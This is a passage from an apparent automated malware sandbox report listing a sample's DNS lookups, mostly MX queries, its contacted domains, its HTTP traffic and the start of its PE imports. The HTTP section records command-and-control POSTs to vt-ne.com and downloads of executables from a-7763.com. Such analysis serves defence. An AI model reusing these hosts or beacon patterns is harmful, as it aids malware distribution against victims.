2836 "data": "106.10.248.75",
2837 "type": "A"
2838 },
2839 {
2840 "data": "106.10.248.84",
2841 "type": "A"
2842 }
2843 ]
2844 },
2845 {
2846 "type": "MX",
2847 "request": "cruisecarsales.com",
2848 "answers": [
2849 {
2850 "data": "cruisecarsales.com",
2851 "type": "MX"
2852 }
2853 ]
2854 },
2855 {
2856 "type": "A",
2857 "request": "cruisecarsales.com",
2858 "answers": [
2859 {
2860 "data": "192.254.185.58",
2861 "type": "A"
2862 }
2863 ]
2864 },
2865 {
2866 "type": "MX",
2867 "request": "davedasilva.com",
2868 "answers": [
2869 {
2870 "data": "davedasilva.com",
2871 "type": "MX"
2872 }
2873 ]
2874 },
2875 {
2876 "type": "A",
2877 "request": "davedasilva.com",
2878 "answers": [
2879 {
2880 "data": "192.254.185.70",
2881 "type": "A"
2882 }
2883 ]
2884 },
2885 {
2886 "type": "MX",
2887 "request": "crossflow.ie",
2888 "answers": [
2889 {
2890 "data": "st1.proactivelabs.ie",
2891 "type": "MX"
2892 },
2893 {
2894 "data": "st2.proactivelabs.ie",
2895 "type": "MX"
2896 }
2897 ]
2898 },
2899 {
2900 "type": "A",
2901 "request": "st1.proactivelabs.ie",
2902 "answers": [
2903 {
2904 "data": "52.51.8.228",
2905 "type": "A"
2906 }
2907 ]
2908 },
2909 {
2910 "type": "MX",
2911 "request": "cingular.com",
2912 "answers": [
2913 {
2914 "data": "mx0b-00191d01.pphosted.com",
2915 "type": "MX"
2916 },
2917 {
2918 "data": "mx0a-00191d01.pphosted.com",
2919 "type": "MX"
2920 }
2921 ]
2922 },
2923 {
2924 "type": "A",
2925 "request": "mx0a-00191d01.pphosted.com",
2926 "answers": [
2927 {
2928 "data": "67.231.149.140",
2929 "type": "A"
2930 }
2931 ]
2932 },
2933 {
2934 "type": "MX",
2935 "request": "freemail.hu",
2936 "answers": [
2937 {
2938 "data": "fmx.freemail.hu",
2939 "type": "MX"
2940 }
2941 ]
2942 },
2943 {
2944 "type": "A",
2945 "request": "fmx.freemail.hu",
2946 "answers": [
2947 {
2948 "data": "84.2.43.65",
2949 "type": "A"
2950 }
2951 ]
2952 },
2953 {
2954 "type": "A",
2955 "request": "static.xx.fbcdn.net",
2956 "answers": [
2957 {
2958 "data": "31.13.80.12",
2959 "type": "A"
2960 },
2961 {
2962 "data": "scontent.xx.fbcdn.net",
2963 "type": "CNAME"
2964 }
2965 ]
2966 },
2967 {
2968 "type": "MX",
2969 "request": "cazzinmassimo.it",
2970 "answers": [
2971 {
2972 "data": "alt1.aspmx.l.google.com",
2973 "type": "MX"
2974 },
2975 {
2976 "data": "alt2.aspmx.l.google.com",
2977 "type": "MX"
2978 },
2979 {
2980 "data": "aspmx2.googlemail.com",
2981 "type": "MX"
2982 },
2983 {
2984 "data": "aspmx3.googlemail.com",
2985 "type": "MX"
2986 },
2987 {
2988 "data": "aspmx.l.google.com",
2989 "type": "MX"
2990 }
2991 ]
2992 },
2993 {
2994 "type": "MX",
2995 "request": "doc.ic.ac.uk",
2996 "answers": [
2997 {
2998 "data": "mx.cc.ic.ac.uk",
2999 "type": "MX"
3000 }
3001 ]
3002 },
3003 {
3004 "type": "A",
3005 "request": "mx.cc.ic.ac.uk",
3006 "answers": [
3007 {
3008 "data": "155.198.31.72",
3009 "type": "A"
3010 },
3011 {
3012 "data": "155.198.31.73",
3013 "type": "A"
3014 },
3015 {
3016 "data": "146.179.32.41",
3017 "type": "A"
3018 },
3019 {
3020 "data": "146.179.32.40",
3021 "type": "A"
3022 }
3023 ]
3024 },
3025 {
3026 "type": "A",
3027 "request": "scontent-yyz1-1.xx.fbcdn.net",
3028 "answers": []
3029 }
3030]
3031
3032[*] Domains: [
3033 {
3034 "ip": "192.185.136.184",
3035 "domain": "kolson.biz"
3036 },
3037 {
3038 "ip": "",
3039 "domain": "fs3.li.umist.ac.uk"
3040 },
3041 {
3042 "ip": "74.6.136.151",
3043 "domain": "yahoo.co.in"
3044 },
3045 {
3046 "ip": "62.151.8.70",
3047 "domain": "mixmail.com"
3048 },
3049 {
3050 "ip": "67.231.149.140",
3051 "domain": "mx0a-00191d01.pphosted.com"
3052 },
3053 {
3054 "ip": "69.64.70.248",
3055 "domain": "mail.dineropractico.net"
3056 },
3057 {
3058 "ip": "192.185.211.97",
3059 "domain": "mail.organizeconsult.com.br"
3060 },
3061 {
3062 "ip": "5.2.88.89",
3063 "domain": "letrahora.com"
3064 },
3065 {
3066 "ip": "209.59.174.147",
3067 "domain": "daveberliner.com"
3068 },
3069 {
3070 "ip": "31.13.80.36",
3071 "domain": "www.facebook.com"
3072 },
3073 {
3074 "ip": "",
3075 "domain": "duq2.cc.duq.edu"
3076 },
3077 {
3078 "ip": "195.70.56.131",
3079 "domain": "andrews.hu"
3080 },
3081 {
3082 "ip": "10.182.93.22",
3083 "domain": "mon.bbc.co.uk"
3084 },
3085 {
3086 "ip": "",
3087 "domain": "justfood.com.ng"
3088 },
3089 {
3090 "ip": "23.236.62.147",
3091 "domain": "wailic.com"
3092 },
3093 {
3094 "ip": "209.128.81.242",
3095 "domain": "crystalgraphics.com"
3096 },
3097 {
3098 "ip": "213.171.216.40",
3099 "domain": "mailserver.davecowton.co.uk"
3100 },
3101 {
3102 "ip": "47.254.157.47",
3103 "domain": "vt-ne.com"
3104 },
3105 {
3106 "ip": "192.254.232.36",
3107 "domain": "mail.bativert-dz.com"
3108 },
3109 {
3110 "ip": "192.254.185.58",
3111 "domain": "cruisecarsales.com"
3112 },
3113 {
3114 "ip": "74.51.186.34",
3115 "domain": "filter.crosslake.net"
3116 },
3117 {
3118 "ip": "140.254.120.26",
3119 "domain": "gw.medctr.ohio-state.edu"
3120 },
3121 {
3122 "ip": "31.13.80.174",
3123 "domain": "www.instagram.com"
3124 },
3125 {
3126 "ip": "212.227.15.41",
3127 "domain": "mx00.1and1.co.uk"
3128 },
3129 {
3130 "ip": "121.96.53.27",
3131 "domain": "mail.wci.com.ph"
3132 },
3133 {
3134 "ip": "",
3135 "domain": "crossfittecnica.com"
3136 },
3137 {
3138 "ip": "104.47.1.33",
3139 "domain": "hotmail-com.olc.protection.outlook.com"
3140 },
3141 {
3142 "ip": "155.245.94.164",
3143 "domain": "essex.ac.uk"
3144 },
3145 {
3146 "ip": "192.254.232.36",
3147 "domain": "bativert-dz.com"
3148 },
3149 {
3150 "ip": "168.95.5.220",
3151 "domain": "msx-smtp-mx2.hinet.net"
3152 },
3153 {
3154 "ip": "",
3155 "domain": "colstate.edu"
3156 },
3157 {
3158 "ip": "204.16.249.144",
3159 "domain": "einstein.edu"
3160 },
3161 {
3162 "ip": "",
3163 "domain": "forschner.cz"
3164 },
3165 {
3166 "ip": "31.13.80.12",
3167 "domain": "scontent-yyz1-1.xx.fbcdn.net"
3168 },
3169 {
3170 "ip": "206.192.191.15",
3171 "domain": "smtp.health.unm.edu"
3172 },
3173 {
3174 "ip": "128.235.251.139",
3175 "domain": "njit.edu"
3176 },
3177 {
3178 "ip": "77.92.222.58",
3179 "domain": "mail.adell-trading.cz"
3180 },
3181 {
3182 "ip": "98.136.96.73",
3183 "domain": "mx-aol.mail.gm0.yahoodns.net"
3184 },
3185 {
3186 "ip": "",
3187 "domain": "ascksa.com"
3188 },
3189 {
3190 "ip": "162.241.226.121",
3191 "domain": "crossflooring.com"
3192 },
3193 {
3194 "ip": "",
3195 "domain": "hope-street.org"
3196 },
3197 {
3198 "ip": "217.173.240.134",
3199 "domain": "loit.no"
3200 },
3201 {
3202 "ip": "104.47.10.36",
3203 "domain": "ug-edu-gh.mail.protection.outlook.com"
3204 },
3205 {
3206 "ip": "65.111.178.5",
3207 "domain": "mail.crystalgraphics.com"
3208 },
3209 {
3210 "ip": "198.185.159.136",
3211 "domain": "clovelly.org.au"
3212 },
3213 {
3214 "ip": "198.46.81.192",
3215 "domain": "chrzan.com"
3216 },
3217 {
3218 "ip": "217.160.233.78",
3219 "domain": "collyb.co.uk"
3220 },
3221 {
3222 "ip": "68.87.20.5",
3223 "domain": "mx2.comcast.net"
3224 },
3225 {
3226 "ip": "",
3227 "domain": "cingular.com"
3228 },
3229 {
3230 "ip": "209.222.82.159",
3231 "domain": "d120086a.ess.barracudanetworks.com"
3232 },
3233 {
3234 "ip": "",
3235 "domain": "besuttisenin.it"
3236 },
3237 {
3238 "ip": "104.47.37.36",
3239 "domain": "patagonia-com.mail.protection.outlook.com"
3240 },
3241 {
3242 "ip": "",
3243 "domain": "doc.ic.ac.uk"
3244 },
3245 {
3246 "ip": "67.219.246.100",
3247 "domain": "cluster6.us.messagelabs.com"
3248 },
3249 {
3250 "ip": "74.51.186.39",
3251 "domain": "crosslake.net"
3252 },
3253 {
3254 "ip": "70.39.151.44",
3255 "domain": "cprautocenter.com"
3256 },
3257 {
3258 "ip": "213.209.1.129",
3259 "domain": "smtp-in.libero.it"
3260 },
3261 {
3262 "ip": "24.116.124.161",
3263 "domain": "cableone.net"
3264 },
3265 {
3266 "ip": "106.10.248.75",
3267 "domain": "mx-apac.mail.gm0.yahoodns.net"
3268 },
3269 {
3270 "ip": "106.10.218.150",
3271 "domain": "aol.com"
3272 },
3273 {
3274 "ip": "62.36.20.73",
3275 "domain": "ing.wanadoo.es"
3276 },
3277 {
3278 "ip": "205.186.161.151",
3279 "domain": "epssworks.com"
3280 },
3281 {
3282 "ip": "84.2.43.64",
3283 "domain": "freemail.hu"
3284 },
3285 {
3286 "ip": "62.24.150.2",
3287 "domain": "tiscali.co.uk"
3288 },
3289 {
3290 "ip": "147.135.179.120",
3291 "domain": "cazzinmassimo.it"
3292 },
3293 {
3294 "ip": "",
3295 "domain": "duq2.int.duq.edu"
3296 },
3297 {
3298 "ip": "213.205.33.63",
3299 "domain": "etb-4.mail.tiscali.it"
3300 },
3301 {
3302 "ip": "67.205.103.71",
3303 "domain": "rsstec.com"
3304 },
3305 {
3306 "ip": "",
3307 "domain": "duq2.cr.duq.edu"
3308 },
3309 {
3310 "ip": "68.65.122.186",
3311 "domain": "tmmaestro.com"
3312 },
3313 {
3314 "ip": "155.245.47.44",
3315 "domain": "isslx102.essex.ac.uk"
3316 },
3317 {
3318 "ip": "172.217.165.3",
3319 "domain": "www.gstatic.com"
3320 },
3321 {
3322 "ip": "192.254.233.158",
3323 "domain": "mail.copelandins.com"
3324 },
3325 {
3326 "ip": "",
3327 "domain": "cofcsem.sdcoxmail.com"
3328 },
3329 {
3330 "ip": "104.47.37.36",
3331 "domain": "ncbmw-com.mail.protection.outlook.com"
3332 },
3333 {
3334 "ip": "205.178.189.131",
3335 "domain": "ncbmw.com"
3336 },
3337 {
3338 "ip": "",
3339 "domain": "dag.sg"
3340 },
3341 {
3342 "ip": "52.51.8.228",
3343 "domain": "st1.proactivelabs.ie"
3344 },
3345 {
3346 "ip": "35.197.204.225",
3347 "domain": "crossflow.ie"
3348 },
3349 {
3350 "ip": "192.185.138.139",
3351 "domain": "caninter.ca"
3352 },
3353 {
3354 "ip": "209.222.82.141",
3355 "domain": "d12916a.ess.barracudanetworks.com"
3356 },
3357 {
3358 "ip": "213.205.32.10",
3359 "domain": "tiscalinet.it"
3360 },
3361 {
3362 "ip": "172.217.1.165",
3363 "domain": "gmail.com"
3364 },
3365 {
3366 "ip": "148.163.129.50",
3367 "domain": "kyc-1.mx10.pef.luxsci.com"
3368 },
3369 {
3370 "ip": "",
3371 "domain": "istitutotumori.mi.it"
3372 },
3373 {
3374 "ip": "50.87.249.94",
3375 "domain": "howardcenter.org"
3376 },
3377 {
3378 "ip": "84.2.43.65",
3379 "domain": "fmx.freemail.hu"
3380 },
3381 {
3382 "ip": "204.79.197.212",
3383 "domain": "hotmail.com"
3384 },
3385 {
3386 "ip": "46.226.52.198",
3387 "domain": "cluster3.eu.messagelabs.com"
3388 },
3389 {
3390 "ip": "124.108.115.100",
3391 "domain": "cs.com"
3392 },
3393 {
3394 "ip": "168.95.4.20",
3395 "domain": "ms2.hinet.net"
3396 },
3397 {
3398 "ip": "188.125.73.87",
3399 "domain": "mx-eu.mail.am0.yahoodns.net"
3400 },
3401 {
3402 "ip": "128.175.90.5",
3403 "domain": "mail.coastal.udel.edu"
3404 },
3405 {
3406 "ip": "98.136.103.23",
3407 "domain": "y7mail.com"
3408 },
3409 {
3410 "ip": "31.13.80.12",
3411 "domain": "static.xx.fbcdn.net"
3412 },
3413 {
3414 "ip": "82.132.141.84",
3415 "domain": "o2.co.uk"
3416 },
3417 {
3418 "ip": "62.24.139.42",
3419 "domain": "mx.tiscali.co.uk"
3420 },
3421 {
3422 "ip": "192.185.136.184",
3423 "domain": "mail.kolson.biz"
3424 },
3425 {
3426 "ip": "",
3427 "domain": "corp.delphiforums.com"
3428 },
3429 {
3430 "ip": "69.89.31.205",
3431 "domain": "mail.clovelly.org.au"
3432 },
3433 {
3434 "ip": "121.96.53.26",
3435 "domain": "wci.com.ph"
3436 },
3437 {
3438 "ip": "155.131.44.69",
3439 "domain": "nationwide.co.uk"
3440 },
3441 {
3442 "ip": "194.0.212.60",
3443 "domain": "stahl-gerlafingen.com"
3444 },
3445 {
3446 "ip": "216.6.138.102",
3447 "domain": "barracuda.crystalgolfresort.com"
3448 },
3449 {
3450 "ip": "66.218.85.52",
3451 "domain": "mta5.am0.yahoodns.net"
3452 },
3453 {
3454 "ip": "52.214.136.107",
3455 "domain": "thamesvalley.police.uk"
3456 },
3457 {
3458 "ip": "54.69.239.253",
3459 "domain": "www.netflix.com"
3460 },
3461 {
3462 "ip": "192.254.185.70",
3463 "domain": "davedasilva.com"
3464 },
3465 {
3466 "ip": "128.175.90.5",
3467 "domain": "dune.coastal.udel.edu"
3468 },
3469 {
3470 "ip": "23.253.176.239",
3471 "domain": "crystalgolfresort.com"
3472 },
3473 {
3474 "ip": "192.124.249.3",
3475 "domain": "dallasmavs.com"
3476 },
3477 {
3478 "ip": "199.34.228.78",
3479 "domain": "cemcrete.co.za"
3480 },
3481 {
3482 "ip": "",
3483 "domain": "rrpac.upr.clu.edu"
3484 },
3485 {
3486 "ip": "80.251.255.3",
3487 "domain": "mx1.uh.cz"
3488 },
3489 {
3490 "ip": "185.81.129.33",
3491 "domain": "a-7763.com"
3492 },
3493 {
3494 "ip": "96.45.83.238",
3495 "domain": "ckdgalbraith.co.uk"
3496 },
3497 {
3498 "ip": "195.130.217.241",
3499 "domain": "eu-smtp-inbound-1.mimecast.com"
3500 },
3501 {
3502 "ip": "85.158.142.201",
3503 "domain": "cluster8.eu.messagelabs.com"
3504 },
3505 {
3506 "ip": "197.255.125.213",
3507 "domain": "ug.edu.gh"
3508 },
3509 {
3510 "ip": "185.156.16.150",
3511 "domain": "hackney.gov.uk"
3512 },
3513 {
3514 "ip": "34.250.123.156",
3515 "domain": "go-for-it.fsnet.co.uk"
3516 },
3517 {
3518 "ip": "31.13.80.36",
3519 "domain": "facebook.com"
3520 },
3521 {
3522 "ip": "204.62.195.34",
3523 "domain": "hollister.com"
3524 },
3525 {
3526 "ip": "200.55.152.131",
3527 "domain": "etecsa.cu"
3528 },
3529 {
3530 "ip": "69.64.70.248",
3531 "domain": "dineropractico.net"
3532 },
3533 {
3534 "ip": "142.4.20.117",
3535 "domain": "centraloregonlimos.com"
3536 },
3537 {
3538 "ip": "104.198.208.33",
3539 "domain": "copelandins.com"
3540 },
3541 {
3542 "ip": "",
3543 "domain": "gruposolarix.com"
3544 },
3545 {
3546 "ip": "148.163.141.199",
3547 "domain": "mxa-00337c01.gslb.pphosted.com"
3548 },
3549 {
3550 "ip": "212.82.100.151",
3551 "domain": "yahoo.fr"
3552 },
3553 {
3554 "ip": "155.198.31.72",
3555 "domain": "mx.cc.ic.ac.uk"
3556 },
3557 {
3558 "ip": "52.19.33.246",
3559 "domain": "suomi24.fi"
3560 },
3561 {
3562 "ip": "194.33.69.195",
3563 "domain": "mail.andrews.hu"
3564 },
3565 {
3566 "ip": "5.2.88.89",
3567 "domain": "mail.letrahora.com"
3568 },
3569 {
3570 "ip": "61.56.200.187",
3571 "domain": "smtpa.wanhai.com"
3572 },
3573 {
3574 "ip": "",
3575 "domain": "apasesores.com"
3576 },
3577 {
3578 "ip": "65.49.39.13",
3579 "domain": "smtp.crossfittroy.com"
3580 },
3581 {
3582 "ip": "141.146.126.73",
3583 "domain": "aserp2020.oracle.com"
3584 },
3585 {
3586 "ip": "",
3587 "domain": "wanhai.com"
3588 },
3589 {
3590 "ip": "23.227.38.32",
3591 "domain": "creativedrinks.com"
3592 },
3593 {
3594 "ip": "200.55.152.133",
3595 "domain": "imx5.etecsa.cu"
3596 },
3597 {
3598 "ip": "31.15.10.95",
3599 "domain": "adell-trading.cz"
3600 },
3601 {
3602 "ip": "",
3603 "domain": "argoss.org"
3604 },
3605 {
3606 "ip": "88.208.252.154",
3607 "domain": "davecowton.co.uk"
3608 },
3609 {
3610 "ip": "95.128.105.101",
3611 "domain": "mx01.telecomputing.no"
3612 },
3613 {
3614 "ip": "34.196.6.209",
3615 "domain": "mx.coxmail.com"
3616 },
3617 {
3618 "ip": "67.225.137.90",
3619 "domain": "dave-lloyd.com"
3620 },
3621 {
3622 "ip": "12.215.42.102",
3623 "domain": "mta3.dallasmavs.com"
3624 },
3625 {
3626 "ip": "140.254.127.28",
3627 "domain": "pfmx01.osumc.edu"
3628 },
3629 {
3630 "ip": "",
3631 "domain": "mail.gmail.com"
3632 },
3633 {
3634 "ip": "52.58.62.238",
3635 "domain": "in.hes.trendmicro.eu"
3636 },
3637 {
3638 "ip": "213.209.17.209",
3639 "domain": "libero.it"
3640 },
3641 {
3642 "ip": "",
3643 "domain": "global-forwarding.co.uk"
3644 },
3645 {
3646 "ip": "137.254.120.50",
3647 "domain": "oracle.com"
3648 },
3649 {
3650 "ip": "104.47.4.36",
3651 "domain": "cemcrete-co-za.mail.protection.outlook.com"
3652 },
3653 {
3654 "ip": "",
3655 "domain": "salud.unm.edu"
3656 },
3657 {
3658 "ip": "5.79.86.41",
3659 "domain": "mx.spamexperts.com"
3660 },
3661 {
3662 "ip": "69.168.106.65",
3663 "domain": "mx.cableone.net"
3664 },
3665 {
3666 "ip": "66.179.56.99",
3667 "domain": "patagonia.com"
3668 },
3669 {
3670 "ip": "50.63.202.34",
3671 "domain": "crossfittroy.com"
3672 },
3673 {
3674 "ip": "",
3675 "domain": "dave9000.com"
3676 },
3677 {
3678 "ip": "209.85.201.26",
3679 "domain": "ALT1.ASPMX.L.GOOGLE.COM"
3680 },
3681 {
3682 "ip": "185.97.172.131",
3683 "domain": "mx1.suomi24.heinlein-hosting.de"
3684 },
3685 {
3686 "ip": "192.185.211.97",
3687 "domain": "organizeconsult.com.br"
3688 },
3689 {
3690 "ip": "69.252.80.75",
3691 "domain": "comcast.net"
3692 },
3693 {
3694 "ip": "",
3695 "domain": "monottiputtini.ch"
3696 }
3697]
3698
3699[*] Network Communication - ICMP: []
3700
3701[*] Network Communication - HTTP: [
3702 {
3703 "count": 1,
3704 "body": "id=2818818937&sd=pub2&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
3705 "uri": "http://vt-ne.com/upload/index.php",
3706 "user-agent": "",
3707 "method": "POST",
3708 "host": "vt-ne.com",
3709 "version": "1.1",
3710 "path": "/upload/index.php",
3711 "data": "POST /upload/index.php HTTP/1.1\r\nHost: vt-ne.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 74\r\n\r\nid=2818818937&sd=pub2&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
3712 "port": 80
3713 },
3714 {
3715 "count": 1,
3716 "body": "",
3717 "uri": "http://a-7763.com/uploads/4d7b8586.exe",
3718 "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
3719 "method": "GET",
3720 "host": "a-7763.com",
3721 "version": "1.1",
3722 "path": "/uploads/4d7b8586.exe",
3723 "data": "GET /uploads/4d7b8586.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: a-7763.com\r\nConnection: Keep-Alive\r\n\r\n",
3724 "port": 80
3725 },
3726 {
3727 "count": 1,
3728 "body": "d1=1000004001&",
3729 "uri": "http://vt-ne.com/upload/index.php",
3730 "user-agent": "",
3731 "method": "POST",
3732 "host": "vt-ne.com",
3733 "version": "1.1",
3734 "path": "/upload/index.php",
3735 "data": "POST /upload/index.php HTTP/1.1\r\nHost: vt-ne.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000004001&",
3736 "port": 80
3737 },
3738 {
3739 "count": 1,
3740 "body": "",
3741 "uri": "http://80.85.155.70/2.php",
3742 "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
3743 "method": "GET",
3744 "host": "80.85.155.70",
3745 "version": "1.1",
3746 "path": "/2.php",
3747 "data": "GET /2.php HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 80.85.155.70\r\nConnection: Keep-Alive\r\n\r\n",
3748 "port": 80
3749 },
3750 {
3751 "count": 1,
3752 "body": "d1=1000006001&",
3753 "uri": "http://vt-ne.com/upload/index.php",
3754 "user-agent": "",
3755 "method": "POST",
3756 "host": "vt-ne.com",
3757 "version": "1.1",
3758 "path": "/upload/index.php",
3759 "data": "POST /upload/index.php HTTP/1.1\r\nHost: vt-ne.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000006001&",
3760 "port": 80
3761 },
3762 {
3763 "count": 1,
3764 "body": "",
3765 "uri": "http://a-7763.com/uploads/9e022403.exe",
3766 "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
3767 "method": "GET",
3768 "host": "a-7763.com",
3769 "version": "1.1",
3770 "path": "/uploads/9e022403.exe",
3771 "data": "GET /uploads/9e022403.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: a-7763.com\r\nConnection: Keep-Alive\r\n\r\n",
3772 "port": 80
3773 },
3774 {
3775 "count": 1,
3776 "body": "d1=1000016001&",
3777 "uri": "http://vt-ne.com/upload/index.php",
3778 "user-agent": "",
3779 "method": "POST",
3780 "host": "vt-ne.com",
3781 "version": "1.1",
3782 "path": "/upload/index.php",
3783 "data": "POST /upload/index.php HTTP/1.1\r\nHost: vt-ne.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000016001&",
3784 "port": 80
3785 },
3786 {
3787 "count": 1,
3788 "body": "",
3789 "uri": "http://www.msftncsi.com/ncsi.txt",
3790 "user-agent": "Microsoft NCSI",
3791 "method": "GET",
3792 "host": "www.msftncsi.com",
3793 "version": "1.1",
3794 "path": "/ncsi.txt",
3795 "data": "GET /ncsi.txt HTTP/1.1\r\nConnection: Close\r\nUser-Agent: Microsoft NCSI\r\nHost: www.msftncsi.com\r\n\r\n",
3796 "port": 80
3797 },
3798 {
3799 "count": 4,
3800 "body": "",
3801 "uri": "http://www.google.com/",
3802 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)",
3803 "method": "GET",
3804 "host": "www.google.com",
3805 "version": "1.1",
3806 "path": "/",
3807 "data": "GET / HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
3808 "port": 80
3809 },
3810 {
3811 "count": 1,
3812 "body": "",
3813 "uri": "http://www.trackip.net/ip",
3814 "user-agent": "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6 Version/10.63",
3815 "method": "GET",
3816 "host": "www.trackip.net",
3817 "version": "1.1",
3818 "path": "/ip",
3819 "data": "GET /ip HTTP/1.1\r\nHost: www.trackip.net\r\nUser-Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6 Version/10.63\r\nAccept: */*\r\n\r\n",
3820 "port": 80
3821 },
3822 {
3823 "count": 1,
3824 "body": "",
3825 "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
3826 "user-agent": "Microsoft-CryptoAPI/6.1",
3827 "method": "GET",
3828 "host": "crl.microsoft.com",
3829 "version": "1.1",
3830 "path": "/pki/crl/products/microsoftrootcert.crl",
3831 "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
3832 "port": 80
3833 },
3834 {
3835 "count": 2,
3836 "body": "",
3837 "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
3838 "user-agent": "Microsoft-CryptoAPI/6.1",
3839 "method": "GET",
3840 "host": "crl.microsoft.com",
3841 "version": "1.1",
3842 "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
3843 "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
3844 "port": 80
3845 },
3846 {
3847 "count": 1,
3848 "body": "",
3849 "uri": "http://api.ipify.org/",
3850 "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0",
3851 "method": "GET",
3852 "host": "api.ipify.org",
3853 "version": "1.1",
3854 "path": "/",
3855 "data": "GET / HTTP/1.1\r\nHost: api.ipify.org\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\nAccept: */*\r\n\r\n",
3856 "port": 80
3857 },
3858 {
3859 "count": 1,
3860 "body": "",
3861 "uri": "http://crl.microsoft.com/pki/crl/products/CSPCA.crl",
3862 "user-agent": "Microsoft-CryptoAPI/6.1",
3863 "method": "GET",
3864 "host": "crl.microsoft.com",
3865 "version": "1.1",
3866 "path": "/pki/crl/products/CSPCA.crl",
3867 "data": "GET /pki/crl/products/CSPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 28 Feb 2009 02:01:22 GMT\r\nIf-None-Match: \"0c55744899c91:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
3868 "port": 80
3869 }
3870]
3871
3872[*] Network Communication - SMTP: []
3873
3874[*] Network Communication - Hosts: []
3875
3876[*] Network Communication - IRC: []
3877
3878[*] Static Analysis: {
3879 "pe": {
3880 "peid_signatures": null,
3881 "imports": [
3882 {
3883 "imports": [
3884 {
3885 "name": "GetProcAddress",
3886 "address": "0x42a000"
3887 },
3888 {
3889 "name": "LocalAlloc",
3890 "address": "0x42a004"
3891 },
3892 {
3893 "name": "GetBinaryTypeA",
3894 "address": "0x42a008"
3895 },
3896 {
3897 "name": "ExitProcess",
3898 "address": "0x42a00c"
3899 },
3900 {
3901 "name": "DebugActiveProcessStop",
3902 "address": "0x42a010"
3903 },
3904 {
3905 "name": "UnlockFile",
3906 "address": "0x42a014"
3907 },
3908 {
3909 "name": "CloseHandle",
3910 "address": "0x42a018"
3911 },
3912 {
3913 "name": "GetTickCount",
3914 "address": "0x42a01c"
3915 },
3916 {
3917 "name": "lstrlenW",
3918 "address": "0x42a020"
3919 },
3920 {
3921 "name": "GetModuleHandleW",
3922 "address": "0x42a024"
3923 },
3924 {
3925 "name": "GetPrivateProfileIntA",
3926 "address": "0x42a028"
3927 },
3928 {
3929 "name": "GetNumberFormatW",
3930 "address": "0x42a02c"
3931 },
3932 {
3933 "name": "PeekConsoleInputA",
3934 "address": "0x42a030"
3935 },
3936 {
3937 "name": "CreateToolhelp32Snapshot",
3938 "address": "0x42a034"
3939 },
3940 {
3941 "name": "Module32First",
3942 "address": "0x42a038"
3943 },
3944 {
3945 "name": "WriteConsoleW",
3946 "address": "0x42a03c"
3947 },
3948 {
3949 "name": "SetStdHandle",
3950 "address": "0x42a040"
3951 },
3952 {
3953 "name": "ReadConsoleW",
3954 "address": "0x42a044"
3955 },
3956 {
3957 "name": "ReadFile",
